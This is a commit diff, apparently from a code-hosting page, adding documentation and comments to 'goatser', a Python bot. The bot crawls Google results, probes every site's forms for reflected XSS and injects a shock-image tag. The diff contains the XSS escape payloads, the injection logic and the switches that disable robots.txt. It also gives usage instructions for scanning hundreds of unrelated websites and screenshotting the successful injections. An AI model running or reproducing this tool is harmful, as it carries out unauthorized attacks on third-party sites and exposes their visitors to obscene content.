Commit 4ab90837 authored by Romain Bignon's avatar Romain Bignon

documentation

parent 8dd77b14
......@@ -13,10 +13,22 @@ Architecture
A script named `goatser.py` is run with a keyword to search for on Google©,
and visits each resulting website. Then, it tries a trivial XSS
`<b>GOATSE</b>` pattern on each form.
pattern on each form. After posting a form, if this pattern is found in the
loaded page, the bot tries to inject the Goatse© photo, then a parser is
used to find it in the document.
Sometimes, we have to escape the pattern, for example with:
* "/>
* ';"/>--></script>
* </title></head><body>
The bot also follows links on the main page whose text contains 'search' or 'cherch'.
When we're sure the Goatse© is included in the document, a snapshot request
is created as a file in the `queue/` directory. Then, the shotfactory daemon
launches VNC and the browser, goes to the website and takes a screenshot.
Depends
-------
* python-mechanize
* python-lxml
thirdparty 'shotfactory':
......@@ -27,5 +39,37 @@ Depends
Setup
-----
There isn't anything to install. First, copy `example.conf` to
`goatser.conf` and edit it.
You first have to run shotfactory:
$ ./shotfactory.sh
Use it
------
Then, run goatse:
$ ./goatser.py KEYWORD [START-PAGE [NB]]
Parameters are:
* KEYWORD: the keyword to search for on Google©.
* START-PAGE: first page to get results from (default=1).
* NB: number of results to analyze.
For example:
$ ./goatser.py goatse 3 200
It is often better to avoid starting on page 1, because the first results are
mostly well-known websites without such trivial XSS issues.
When an XSS is found, a screenshot is taken by shotfactory and put in the
`screenshots` directory.
Examples
--------
To see example screenshots taken with Goatser, go to:
http://people.symlink.me/~rom1/goatse/
......@@ -30,13 +30,6 @@ import lxml.html
from ConfigParser import RawConfigParser, NoOptionError, NoSectionError
class NoHistory(object):
    """
    History stand-in whose every operation does nothing.

    It offers `add`, `back`, `clear` and `close`, but keeps no state at all.
    NOTE(review): presumably meant as a drop-in replacement for the
    mechanize history object -- confirm against the caller.
    """

    def __init__(self):
        """Create the object; there is no state to set up."""

    def add(self, request, response):
        """Ignore the request/response pair instead of recording it."""

    def back(self, n, _response):
        """Ignore the request to step back `n` entries."""

    def clear(self):
        """Nothing is stored, so there is nothing to clear."""

    def close(self):
        """Nothing is held open, so there is nothing to close."""
class Match(object):
def __init__(self):
self.pattern = None
......@@ -75,10 +68,10 @@ class Browser(mechanize.Browser):
FIRST_STR = '<b>GOATSE</b>'
FINAL_STR = '<img src=%s />'
ESCAPES = ['', '"/>', '\';"/>--></script>', '</title></head><body>']
USER_AGENT = 'Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc13 Firefox/3.6.13'
default_features = copy(mechanize.Browser.default_features)
default_features.remove('_robots')
default_features.remove('_refresh')
USER_AGENT = 'Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc13 Firefox/3.6.13'
def __init__(self, config):
mechanize.Browser.__init__(self)
......@@ -94,6 +87,7 @@ class Browser(mechanize.Browser):
print 'Go on %s' % args[0]
else:
print 'Submit %s' % args[0].get_full_url()
# set timeout to 10s.
kwargs['timeout'] = 10
return mechanize.Browser.open(self, *args, **kwargs)
......@@ -104,7 +98,7 @@ class Browser(mechanize.Browser):
not 'wikipedia' in url and \
not 'wiktionary' in url
def is_editable_ctrl(self, ctrl):
def is_editable_text_ctrl(self, ctrl):
    """
    Tell whether `ctrl` is a text control which is neither a password
    control nor a hidden control.
    """
    is_text = ctrl.is_of_kind('text')
    if not is_text:
        # Not a text control: hand back the falsy result unchanged.
        return is_text
    return not isinstance(ctrl, (ClientForm.PasswordControl, ClientForm.HiddenControl))
def iter_results(self, keyword, page=0, nb=10):
......@@ -119,11 +113,17 @@ class Browser(mechanize.Browser):
return links
def try_website(self, url):
"""
Try to goatse a website from url.
It firstly tries on the main page, then on links containing 'search'
or 'cherch'.
"""
self.try_url(url)
links = []
for link in self.links():
if link.text and ('search' in link.text.lower() or 'recherch' in link.text.lower()) and \
if link.text and ('search' in link.text.lower() or 'cherch' in link.text.lower()) and \
self.is_valid_link(link.url):
links.append(link.absolute_url)
......@@ -131,12 +131,19 @@ class Browser(mechanize.Browser):
self.try_url(link)
def check_form(self, form, pattern, predicate=None):
"""
Try to XSS a form.
It returns a Match object if it is found. The `predicate` parameter
is an optional function which takes a Match object as argument and
which returns True if the XSS is found.
"""
if not predicate:
predicate = lambda x: pattern in x.data
self.form = form
for ctrl in form.controls:
if self.is_editable_ctrl(ctrl):
if self.is_editable_text_ctrl(ctrl):
ctrl.value = pattern
res = self.submit()
......@@ -156,10 +163,15 @@ class Browser(mechanize.Browser):
self.back()
def check_image(self, match):
"""
Predicate for the `check_form` method to find the Goatse® img in
document.
"""
document = lxml.html.parse(match.res)
for img in document.getiterator('img'):
if 'src' in img.attrib and img.attrib['src'] == self.config.img_url:
parent = img.getparent()
# Goatse is viewable only in <body>.
while parent is not None:
if parent.tag == 'body':
return True
......@@ -167,6 +179,12 @@ class Browser(mechanize.Browser):
return False
def snapshot(self, match):
"""
Create a request for snapshot of a matched page.
It saves it in the shotfactory queue directory, and a .PNG will
be created soon in `screenshots/`
"""
domain = urlparse(match.url).netloc
try:
with open(os.path.join(self.config.queuedir, domain), 'w') as f:
......@@ -182,18 +200,24 @@ command %s
print 'Unable to take snapshot: %s' % e
def try_url(self, url):
"""
Try to goatse an URL.
"""
# avoid testing the same URL several times.
if url in self.tested:
return
self.tested.add(url)
self.open(url)
# try each form.
for form in self.forms():
rightright = False
if form.method.lower() != 'get':
continue
for ctrl in form.controls:
if self.is_editable_ctrl(ctrl):
if self.is_editable_text_ctrl(ctrl):
rightright = True
break
......@@ -202,9 +226,12 @@ command %s
match = self.check_form(form, self.FIRST_STR)
if match:
print 'FOUNDING..'
# The trivial pattern is found in the resulted page. Now let's
# try a Goatse and find it in parsed document.
print 'FINDING..'
match = None
i = 0
# Try several kinds of escape.
while match is None and i < len(self.ESCAPES):
match = self.check_form(form, self.ESCAPES[i] + self.FINAL_STR, self.check_image)
if match:
......@@ -235,7 +262,7 @@ if __name__ == '__main__':
try:
b.try_website(url)
except KeyboardInterrupt:
print '^C'
print ''
except Exception, e:
try:
print 'Error: %s' % e
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment